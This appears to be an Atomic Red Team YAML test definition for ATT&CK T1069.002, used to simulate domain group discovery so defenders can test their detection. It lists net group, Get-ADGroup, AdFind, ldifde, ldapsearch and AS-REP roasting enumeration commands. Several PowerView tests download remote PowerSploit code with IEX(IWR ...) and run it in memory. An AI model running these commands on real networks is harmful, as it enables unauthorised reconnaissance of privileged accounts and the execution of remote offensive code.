attack_technique: T1069.002 display_name: 'Permission Groups Discovery: Domain Groups' atomic_tests: - name: Basic Permission Groups Discovery Windows (Domain) auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d description: | Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. supported_platforms: - windows executor: command: | net localgroup net group /domain net group "enterprise admins" /domain net group "domain admins" /domain name: command_prompt - name: Permission Groups Discovery PowerShell (Domain) auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 description: | Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. supported_platforms: - windows input_arguments: user: description: User to identify what groups a user is a member of type: string default: $env:USERNAME executor: command: | get-ADPrincipalGroupMembership #{user} | select name name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 description: | Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. supported_platforms: - windows executor: command: | net groups "Account Operators" /domain net groups "Exchange Organization Management" /domain net group "BUILTIN\Backup Operators" /domain net group "Domain Admins" /domain name: command_prompt - name: Find machines where user has local admin access (PowerView) auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 description: | Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose name: powershell - name: Find local admins on all machines in domain (PowerView) auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd description: | Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose name: powershell - name: Find Local Admins via Group Policy (PowerView) auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a description: | takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. supported_platforms: - windows input_arguments: computer_name: description: hostname of the computer to analyze type: path default: $env:COMPUTERNAME executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b description: | When successful, accounts that do not require kerberos pre-auth will be returned supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: | Computer must be domain joined. prereq_command: | if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} get_prereq_command: | Write-Host Joining this computer to a domain must be done manually. - description: | Requires the Active Directory module for powershell to be installed. prereq_command: | if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} get_prereq_command: | Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" executor: name: powershell elevation_required: false command: | get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: - windows input_arguments: optional_args: description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. type: string default: dependency_executor_name: powershell dependencies: - description: | AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args} name: command_prompt - name: Enumerate Active Directory Groups with Get-AdGroup auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 description: | The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps supported_platforms: - windows executor: name: powershell command: | Get-AdGroup -Filter * - name: Enumerate Active Directory Groups with ADSISearcher auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0 description: | The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ supported_platforms: - windows executor: name: powershell elevation_required: false command: | ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne() - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 description: | When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: | Computer must be domain joined. prereq_command: | if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} get_prereq_command: | Write-Host Joining this computer to a domain must be done manually. - description: | Requires the Active Directory module for powershell to be installed. prereq_command: | if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} get_prereq_command: | Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" executor: name: powershell elevation_required: false command: | Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name - name: Get-DomainGroupMember with PowerView auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145 description: | Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed. supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" name: powershell - name: Get-DomainGroup with PowerView auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230 description: | Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed. supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose name: powershell - name: Active Directory Enumeration with LDIFDE auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784 description: | Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF supported_platforms: - windows input_arguments: output_path: description: Path to the file that ldifde will output type: path default: C:\Windows\temp output_file: description: The filename to be created by ldifde type: string default: atomic_ldifde.txt dependency_executor_name: powershell dependencies: - description: | PowerShell ActiveDirectory Module must be installed prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null exit 0 } Catch { exit 1 } get_prereq_command: | if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online } else { Install-WindowsFeature RSAT-AD-PowerShell } executor: elevation_required: true command: | ldifde.exe -f #{output_path}\#{output_file} -p subtree cleanup_command: | del #{output_path}\#{output_file} name: command_prompt - name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2 description: | Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory supported_platforms: - linux input_arguments: domain: description: The domain to be tested type: string default: example top_level_domain: description: The top level domain (.com, .test, .remote, etc... following domain, minus the .) type: string default: com user: description: username@domain of a user type: string default: user@example.com password: description: password of the user referenced inside user type: string default: s3CurePssw0rD! dependency_executor_name: sh dependencies: - description: | Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch prereq_command: | which ldapsearch get_prereq_command: | echo missing ldapsearch command; exit 1 executor: elevation_required: false command: | ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn name: sh